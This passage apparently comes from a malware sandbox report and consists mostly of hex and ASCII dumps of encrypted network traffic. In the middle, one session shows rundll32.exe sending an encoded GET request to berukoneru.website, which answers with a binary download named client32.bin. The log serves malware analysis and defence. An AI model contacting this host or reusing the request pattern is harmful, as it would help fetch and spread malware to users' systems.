                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC773INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC789INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:39 UTC805INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:39 UTC821INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:39 UTC837INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:39 UTC853INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:39 UTC869INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:39 UTC885INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.64981679.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC661OUTGET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC892INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=lmogimr44v0q8gcemefberh542; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC892INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                            Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                            2021-12-14 09:21:39 UTC908INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                            Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                            2021-12-14 09:21:39 UTC924INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                            Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                            2021-12-14 09:21:39 UTC940INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                            Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                            2021-12-14 09:21:39 UTC956INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                            Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                            2021-12-14 09:21:39 UTC972INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                            Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                            2021-12-14 09:21:39 UTC988INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                            Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                            2021-12-14 09:21:39 UTC1004INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                            Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                            2021-12-14 09:21:39 UTC1020INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                            Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                            2021-12-14 09:21:39 UTC1036INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                            Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                            2021-12-14 09:21:39 UTC1052INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 